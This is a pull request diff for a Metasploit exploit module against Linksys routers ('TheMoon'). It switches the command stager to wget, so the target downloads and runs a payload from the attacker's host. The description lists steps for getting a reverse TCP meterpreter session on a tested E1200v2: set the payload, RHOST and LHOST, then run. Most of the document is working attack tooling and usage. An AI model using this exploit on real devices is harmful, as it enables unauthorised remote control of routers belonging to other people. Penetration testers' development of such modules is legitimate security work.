### PR TITLE
Update themoon exploit to use wget command stager

### DIFF
--- a/modules/exploits/linux/http/linksys_themoon_exec.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec.rb
@@ -62,7 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-      'DefaultTarget'   => 0
+      'DefaultTarget'   => 0,
+      'DefaultOptions' => { 'WfsDelay' => 30 }
       ))
       deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
@@ -116,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Exploiting...")
-    execute_cmdstager({:flavor  => :echo})
+    execute_cmdstager({:flavor  => :wget})
   end
 
 end


### PR DESCRIPTION
Use the shiny new `wget` flavor of command stager for `exploits/linux/http/linksys_themoon_exec` (h/t @wvu-r7). This allows large stageless payloads to be used and has a nifty side-effect of not killing the web service it exploits.

Verification
========

- [x] Connect to a target (tested on an E1200v2)
- [x] Start up `./msfconsole`
- [x] `use exploit/linux/http/linksys_themoon_exec`
- [x] `set payload linux/mipsle/mettle_reverse_tcp`
- [x] `set RHOST 192.168.1.1`
- [x] `set LHOST <IP>`
- [x] `run`
- [x] A session should pop up
- [x] `curl -i http://192.168.1.1` should pop out a 200 and some HTML